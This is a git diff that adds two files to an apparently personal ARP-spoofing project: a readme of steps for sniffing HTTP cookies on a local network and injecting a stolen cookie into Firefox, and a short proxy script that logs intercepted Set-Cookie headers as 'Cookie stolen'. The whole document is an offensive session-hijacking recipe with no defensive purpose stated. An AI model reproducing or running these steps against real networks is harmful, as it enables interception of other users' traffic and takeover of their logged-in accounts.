diff --git a/arpspoofing/coockie/readme.txt b/arpspoofing/coockie/readme.txt
new file mode 100644
index 0000000..3b7f7d9
--- /dev/null
+++ b/arpspoofing/coockie/readme.txt
@@ -0,0 +1,16 @@
+
+
+run arpspoofing
+
+run wireshark and filter "http.cookie"
+
+
+
+
+run in console firefox for inject cookie:
+
+document.cookie = "sniffing cookie; domain=.domain.com; path=/; Secure";
+
+
+
+
diff --git a/arpspoofing/coockie/steal.js b/arpspoofing/coockie/steal.js
new file mode 100644
index 0000000..5e5be3f
--- /dev/null
+++ b/arpspoofing/coockie/steal.js
@@ -0,0 +1,5 @@
+function onResponse(req, res) {
+	if (res.Headers['Set-Cookie']) {
+		console.log('Cookie stolen: ' + res.Headers['Set-Cookie']);
+	}
+}